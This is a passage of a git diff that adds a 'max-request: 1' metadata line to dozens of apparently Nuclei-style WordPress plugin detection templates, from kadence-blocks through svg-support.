https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 56d2e4efcd..829edad042 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: 